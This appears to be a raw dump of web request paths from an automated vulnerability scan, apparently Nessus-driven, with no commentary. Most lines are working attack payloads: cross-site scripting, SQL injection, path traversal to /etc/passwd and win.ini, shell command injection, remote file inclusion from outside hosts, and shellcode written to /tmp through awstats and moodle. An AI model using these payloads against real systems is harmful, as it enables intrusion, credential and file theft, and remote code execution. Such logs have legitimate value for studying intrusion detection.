src=\"javascript:alert(cross_site_scripting.nasl);\">\n/f-script/\n/help.php?q=\"|ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/scripts/login.asp\n/javascript/imagefolio.exe\n/cgi-perl/.passwd\n/mv8wxfy9.pl?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/jsp/sessions/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/scripts/lrn28issfuqi.php\n/javascript/~test.exe\n/9kr0ih0v.pl?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/main.php?stuff=\"ping;-w;11000;-n;1;4.3.2.1&rem;\n/examples/servlets/servlet/simple/view_page?mv_arg=|cat /etc/passwd|\n/recordings/js/scripts.php?load=/etc/passwd\\x00\n/main.php?stuff=\"&ver&rem;\n/edv3mapy.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/wheelman's - bushpig/\n/lsoix5h3.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6wb70v0b.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/b4vng02k.php3?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/jnv890lt.php?<script>cross_site_scripting.nasl</script>\n/cacti/sgdynamo.exe?htname=<script>foo</script>\n/javascript/jpg.exe\n/copatranscript_20061107/\n/1qwv2p5p.kspx?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/en-us/account/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/manager/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/inscriptos/\n/rss_script/\n/en-us/account/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/cacti/perl.exe?-v\n/manager/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/scripts/1hactwocbsuo.php\n/acunetixxsshy6/\n/jobs-descriptions/\n/javascript/.htaccess/'`uname`'\n/manager/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/main.php?logout=\"&rm\\xa0q66468753&rem\\xa0\n/scripts/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/j2kdmfw4.idc?<script>cross_site_scripting.nasl</script>\n/ttxssh2_101/\n/help.php?q=\"&ver >q92537281&rem \n/scripts/..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\\"\n/manager/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/jnv890lt.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testsbvw=6289;\"</script>\n/scripts/ui/login?user=nessus-1331919064\n/examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='868160889\n/main.php?stuff='uname\\x09#\n/examples/jsp/cal/minis.php?month=../../../../../../etc/passwd\n/hrttz9fj.jsp?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/aj3pf49c.mscgi?<script>document.cookie=\"testnofv=4170;\"</script>\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- \n/ghswfouu.html?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/fa8p8lr8.htm?<script>cross_site_scripting.nasl</script>\n/j2kdmfw4.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(923121609)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1081955105)</script>\n/mysubscriptions/\n/g3w7y7u5.php?<script>document.cookie=\"testbfpq=3326;\"</script>\n/0qhcnefz.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://cirt.net/rfiinc.txt?\n/examples/jsp/colors/embed/day.php?path=/etc/passwd\\x00\n/examples/jsp/num/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/bn857frh.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testiabz=5220;\"</script>\n/scripts/qg9h0c0svvat.php\n/main.php?stuff='sleep 9 #\n/<script>document.cookie=\"testmybc=2088;\"</script>\n/scripts/1hactwocbsuo.php3\n/scripts/contents.htm\n/top.php?stuff=&ver >q39715573&rem \n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/vir0v3xfc??\n/jdx255ea.do?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/templates/prescription/?d=a\n//q47719336&#38;q1431&#34;q1431&#60;q1431&#62;q47719336\n/apavxugx.jspa?<script>document.cookie=\"testdnbh=5237;\"</script>\n/main.php?logout=\"&ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/scripts/bizmail.cgi\n/examples/jsp/checkbox/index.php?id='\n/weq93ppb.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='&uname\\x09>q42899831\\x09#\n/top.php?stuff=\"&del,q38169729&rem,\n/comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/6n7aacgg.x?<script>cross_site_scripting.nasl</script>\n/ywaxntrx.exe?<script>cross_site_scripting.nasl</script>\n/main.php?logout='sleep 9 #\n/scripts/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?logout=\"ver&rem \n/en-us/esmozg5d.cfm?<script>cross_site_scripting.nasl</script>\n/7uz3ok60.mscgi?<script>cross_site_scripting.nasl</script>\n/cgi-home/sensepost.exe?/c+dir\n/index.php?op=default&date=200607' union select 1,1310726682,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --\n/en-us/account/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/top.php?stuff=\\x0duname >q31716147 #\n/examples/jsp/num/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/examples/jsp/colors/supporter/tupdate.php?groupid=change&sg='\n/cgi-bin/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/e9rx3ya4.jsp?<script>cross_site_scripting.nasl</script>\n/recordingssearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/bl8sefdm.php?<script>cross_site_scripting.nasl</script>\n/fmnveedu.do?<script>document.cookie=\"testgfbr=7014;\"</script>\n/admin/script.php\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/mpnqzgnare0;'); function v\n/uc3w3bdi.jspa?<script>document.cookie=\"testxllt=9940;\"</script>\n/m5103snj.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vhzmaia2.aspx?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/javascript/porn.exe\n/j4drbkil.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='\\x0ddel\\x09q61875212\\x09#\n/en-us/h5sc3gxy.jsp?<script>cross_site_scripting.nasl</script>\n/3m5knyc4.cfc?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/ap58k3ci.php?<script>cross_site_scripting.nasl</script>\n/vubbxss/\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --\n/javascript/document.stackdump\n/scripts/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/cgi-bin/phptonuke.php?filnavn=/etc/passwd\n/nsn/..\\util/type.bas\n/scripts/nryr3lvrjnwx.cgi\n/examples/jsp/error/js/scripts.php?load=/etc/passwd\\x00\n/cgi-bin/search.php?searchstring=<script>foo</script>\n/recordings/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/bxnyrhmh.x?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/zmvq66jy.dll?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=ver,>q34852419&rem,\n/scripts/help.php?section='qualiteam_xcart_sql_xss.nasl\n/cgi.cgi/windmail.exe\n/examples/jsp/checkbox/sawmill6cl.exe?ho+{complete_version}\n/cactisearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/en-us/account/starnet/addons/slideshow_full.php?album_name='1580973315\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332009304')</script>\n/en-us/ddoworrl.jspa?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/don't fuck this up/\n/examples/jsp/num/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/h5i6crm3.exe?<script>document.cookie=\"testlihk=7070;\"</script>\n/5o9zq43e.fts?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.php?<script>document.cookie=\"testydan=5106;\"</script>\n/opensiteadmin/scripts/classes/fieldmanager.php?path=@rfiurl\\x00\n/scripts/cevvxrxqxc_b.inc\n/main.php?stuff='\\x0asleep 11 #\n/help.php?q=\"rm;q77231587&rem;\n/manager/include/sql.php?include_path=/etc/passwd\\x00\n/recordings/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/press-conference_transcript/\n<meta http-equiv=set-cookie content=\"testggad=2000\">\n/en-us/account/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/examples/jsp/num/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/main.php?logout='\\x0duname >q95689814 #\n/main.php?logout=\"del\\x09q46762746\\x09#\n/weq93ppb.cgi?<script>cross_site_scripting.nasl</script>\n/recordings/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/scripts/tomcat_proxy_directory_traversal.nasl1331909178\n/scripts/tools/newdsn.exe\n/ccert's practice in anti-spam/\n/a0imiuf1.pl?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/footer.inc.php?la_pow_by=<script>alert(414316083571)</script>\n/aj3pf49c.nsf?<script>document.cookie=\"testnofv=4170;\"</script>\n/vhzmaia2.do?<script>document.cookie=\"testkogj=3979;\"</script>\n/fnwhrxyd.html?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5b+0c+83+c3+0c+89+da+8b+5b+04+39+d3+75+01+cc+8b+73+30+89+ef+6a+0d+59+66+ad++>>ctdn\n/q703m78q.idc?<script>document.cookie=\"testvowq=604;\"</script>\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.bak\n/t7tm4m0b.aspx?<script>cross_site_scripting.nasl</script>\n/ydexw8by.jspa?<script>document.cookie=\"testulex=4996;\"</script>\n/help.php?q=\"\\x0ddel\\x09q41994252\\x09#\n/cgi-bin/store.cgi?startid=../../../../../../../../../../etc/passwd\\x00.html\n/forum/index.php?method=&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/fpnpp5zg.idc?<meta http-equiv=set-cookie content=\"testyias=101\">\n/examples/jsp/colors/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"|ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/cacti/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/examples/jsp/checkbox/base_qry_common.php?base_path=/etc/passwd\\x00\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/scripts/cdjnwtwnqga1.php3\n/scripts/qbch5ojumj32.asp\n/description-viagra/\n/ygkjkngd.aspx?<script>document.cookie=\"testnago=4518;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/pzeceeynoq0;'); function v\n/help.php?q=;rm\\x09q84834127\\x09#\n/examples/jsp/cal/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/maxd641.exe/\n/scripts/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/examples/jsp/num/al_initialize.php?alpath=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/shoutbox.php?conf=../\n/scripts/customer.pl\n/edv3mapy.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/scripts/webplus?about\n/webcgi/htimage.exe/path/filename?2,2\n/main.php?stuff=\"&del\\x0bq52976574&rem\\x0b\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/nopasswd/\n/0u75ldxq.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/themes/default/index.php?theme[options]=1&settings[skin]=../../default/images/top.gif\\x00\n/en-us/odzk29aa.nsf?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/m4kkjf8l.mscgi?<script>document.cookie=\"testyglc=8988;\"</script>\n/scripts/environ.pl\n/scripts/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/base_qry_common.php?base_path=/etc/passwd\\x00\n/fa8p8lr8.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b1q8bywu.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/index.php?id='union/**/select/**/0,0,1424469027,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/raanw4ia.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/viewpage.php?file=/etc/passwd\n/examples/servlets/servlet/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/zv8tv7h8.mscgi?<script>document.cookie=\"testcqwz=9752;\"</script>\n/rv98iwjp.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/index.cfm?fuseaction=category.display&category_id='\n/5o9zq43e.php?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ver\\x09>q89486418&rem\\x09\n/examples/jsp/jsp2/jspx/source?v=../../../../../../../../../../etc/passwd\\x00\n/fa8p8lr8.php3?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/qcywjpzuja0;echo|awstats232216.txt\n/webcgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/javascript/don.exe\n/0qhcnefz.cgi?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/script/gestion/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/test.php?evalme=eval($_server[http_x_axkqdcilykzzimkvzxg]);\n/top.php?stuff='|sleep\\x0910\\x09#\n/nispasswd/\n/cgi-bin/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/ace-auto's/\n/examples/jsp/sessions/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/examples/jsp/colors/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/jules verne, the world's greatest prophet science and invention, vol/\n/7o5qp766.php?<script>cross_site_scripting.nasl</script>\n/zv8tv7h8.cgi?<script>document.cookie=\"testcqwz=9752;\"</script>\n/top.php?stuff=\"del,q55729425&rem,\n/5qnlm5z2.jsp?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/ysooqnjtxq0;echo|awstats824539.txt\n/help.php?q=&ver >q32627628&rem \n/news.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/zroo33l4.exe?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/examples/jsp/num/search.php?searchstring=<script>foo</script>\n/manager/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/cgi-bin/check_user_id.php?user_id=<script>foo</script>\n/raanw4ia.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/past.exe\n/main.php?logout=\"|ping,-w,9000,-n,1,4.3.2.1|rem,\n/scripts/shopper.cgi?newpage=../../../../../../etc/passwd\n/ybz5rz7a.pl?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/byrg33fw.exe?<script>document.cookie=\"testexuu=5340;\"</script>\n/examples/jsp/security/protected/.j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.swp\n/examples/jsp/colors/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/zorum/index.php?method=&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il?\n/o1zj4u9v.exe?<script>document.cookie=\"testabrn=6368;\"</script>\n/scripts/udblphlq4nln.php\n/scriptcontent/\n/azcrfs8d.do?<script>document.cookie=\"testjpdr=9205;\"</script>\n/vb-script/\n/vwmg565s.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??\n/en-us/s7qus4g3.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\";sleep 8 #\n/top.php?stuff='\\x0auname\\x09>q46955555\\x09#\n/help.php?q=\"del q41912626&rem \n/examples/jsp/colors/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/esmozg5d.idc?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q49168279&frm_user=&scr_height=&scr_width=\n/php/php.exe?c:\\winnt\\boot.ini\n/scripts/desktopmodules/bdpdt/uploadfilepopup.aspx\n/examples/jsp/checkbox/fxm.exe\n/top.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/scripts/admin/objects.inc.php4?server[path]=http://xxxxxx&server[language_file]=nessus.php\n/manager/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/suse linux pwdutils 'chfn' utility local privilege escalation exploit/\n/q703m78q.aspx?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/j734qobz.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7u1pb2xi.kspx?<script>document.cookie=\"testlwwz=718;\"</script>\n/recordings/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/ghswfouu.cgi?<script>document.cookie=\"testsqmm=5713;\"</script>\n/en-us/account/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349\n/main.php?stuff=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/scripts/rihzp7swr3p6.cgi\n/edv3mapy.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/texis.exe/nessus\n/cgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/examples/jsp/error/index.php?id='\n/cgi-win/fileseek.cgi?foot=;cat /etc/passwd&head=\n/<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/main.php?logout=\"ping;-w;11000;-n;1;1.2.3.4&rem;\n/x2gyorli.kspx?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/subscriptions.lib\n/weq93ppb.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/query.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/examples/jsp/jsp2/el/rot13sj.cgi?/etc/passwd\n/l4fz1dqw.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/core/api.php?t_path_core=/etc/passwd\\x00\n/top.php?stuff='\\x0ddel q76686472 #\n/9ko6m4c8.dll?<script>document.cookie=\"testylik=3403;\"</script>\n/bl8sefdm.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t578vqea.kspx?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/examples/jsp/checkbox/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff=\"ver >q63222197&rem \n/eei78ore.exe?<script>cross_site_scripting.nasl</script>\n/cgi-bin/nul/../../../../../../../../../winnt/system32/ipconfig.exe\n/examples/jsp/jsp2/jspx/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/d5a5renl.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/zq9frlz6fcfp.sh\n/main.php?stuff='\\x0asleep 8 #\n/cgi-bin/default.asp?istate=duclassmate_sql_injections.nasl'&nstate=utah\n/\"britney spears\"/\n/phpmyadmin/pfdispaly?../../../../../../etc/passwd\n/if69ddo1.cfc?<script>document.cookie=\"testiabz=5220;\"</script>\n/zqqemp6j.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/postpaid.exe\n/en-us/esmozg5d.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.lst\n/en-us/account/search.jsp?q=%\"<script>alert(1331909235)</script>\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/0z575z74.aspx?<script>document.cookie=\"testuhsv=9753;\"</script>\n/pda's / handheld pc's /\n/b1q8bywu.asp?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/webcgi/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/examples/jsp/checkbox/data/fetch.php?page='\n/scripts/bsml.pl?action=sm\n/ovcgi/getnnmdata.exe\n/clonazepam-description/\n/examples/jsp/colors/mylog.html?screen=/etc/passwd\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=q24745466&scr_width=\n/ny1b3qq4.cgi?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>ctdn\n/examples/jsp/cal/file.php?path=/etc/passwd\\x00\n/en-us/9kr0ih0v.do?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/e9rx3ya4.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1\n/examples/jsp/checkbox/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/cgi-914/query?mss=../config\n/j2kdmfw4.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/help.php?q='sleep 9 #\n/javascript/batch.exe\n/scripts/notify?from=nessus\"|id\"\n/main.php?stuff=\"&ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/viewcvs.cgi/?cvsroot=<script>foo</script>\n/examples/jsp/colors/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/javascript/cpp.exe\n/main.php?logout=\"&ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/examples/jsp/sessions/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/phpmyadmin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?stuff=\"\\x0duname\\x09#\n/dda2qr7j.idc?<script>cross_site_scripting.nasl</script>\n/fo564rei.do?<script>cross_site_scripting.nasl</script>\n/manager/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/gjehhrjnrx0;echo|awstats520569.txt\n/examples/jsp/jsp2/jspx/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331923201\n/dexter's/\n/examples/jsp/error/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/6dlc2zm9.idc?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/ttxssh2_220/\n/l4fz1dqw.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/iroy1gvqrrqu??&cmd=id\n/iajtej82.mscgi?<script>cross_site_scripting.nasl</script>\n/6n7aacgg.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?act=arcade&do=stats&gameid=1'\n/<script>document.cookie=\"testkgqo=204;\"</script>\n/en-us/jnv890lt.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/baha'ism/\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904226\n/lsoix5h3.do?<script>cross_site_scripting.nasl</script>\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904224)</script>\n/en-us/jnv890lt.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forum1_professionnel.asp?n=1771&amp;nn=c:\\boot.ini&amp;page=1\n/main.php?stuff=\"|sleep 11 #\n/examples/jsp/num/misc/audio.php?recording=../version.inc\n/javascript/01.exe\n/main.php?stuff=\"\\x0arm q45664393 #\n<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/iv5vkgam.jspa?<script>document.cookie=\"testfosd=94;\"</script>\n/en-us/hipkz026.do?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/phpmyadmin/calendar.php?serverpath=/etc/passwd\\x00\n/scripts/nckowqpd4zng.php\n/j4rdyhw8.jsp?<script>document.cookie=\"testrluj=1420;\"</script>\n/fa8p8lr8.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/<script>cross_site_scripting.nasl</script>.nsf\n/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/0z575z74.html?<script>document.cookie=\"testuhsv=9753;\"</script>\n/examples/jsp/jsp2/el/index.php?string='\n/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/ows-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/(ebook) mcgraw hill - set your voice free ; singing, presentation and public speaking 1999/\n/scripts/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/8t9v8k7x.jsp?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/bl8sefdm.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/r3le3om5.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/minis.php?month=../../../../../../etc/passwd\n/scripts/rvckwz6smkqf.cfm\n/6qbynt4f.jspa?<script>cross_site_scripting.nasl</script>\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1486551460,0,0,0,0,0--\n/bl8sefdm.htm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/servlet/org.apache.catalina.servlets.webdavstatus/<script>alert('vulnerable')</script>\n/ywaxntrx.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/styles.php?toroot=/etc/passwd\\x00\n/javascript/club.exe\n/h5i6crm3.html?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/scripts/samples/search/qsumrhit.htw\n/cgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/odzk29aa.kspx?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/ydexw8by.html?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/bn857frh.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?'+convert(varchar,0x7b5d)+'=1\n/?<script>document.cookie=\"testwhac=3130;\"</script>\n/b4vng02k.php3?<script>document.cookie=\"testtrlh=3672;\"</script>\n/scripts/event_view.php?eid=34 union select 452593950\n/help.php?q=\"&del;q53523271&rem;\n/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>\n/scripts/piywzua5hwer.php3\n/scripts/rwcgi60/showenv\n/confirmunsubscription.php?output=http://192.168.202.96:8080/txenjrxf3?\n/examples/jsp/cal/perl.exe?-v\n/examples/jsp/error/webplus.exe?script=webplus_install_path.nasl\n/scripts/c32web.exe/changeadminpassword\n/9o6g5vkn.kspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0adel\\x09q14875513\\x09#\n/main.php?logout=ver;>q49877598&rem;\n/xsqln7eb.x?<script>document.cookie=\"testpcbb=9254;\"</script>\n/scripts/cgimail.exe\n/help.php?q=\"&rm q34212187 #\n/0rufe52p.jspa?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie 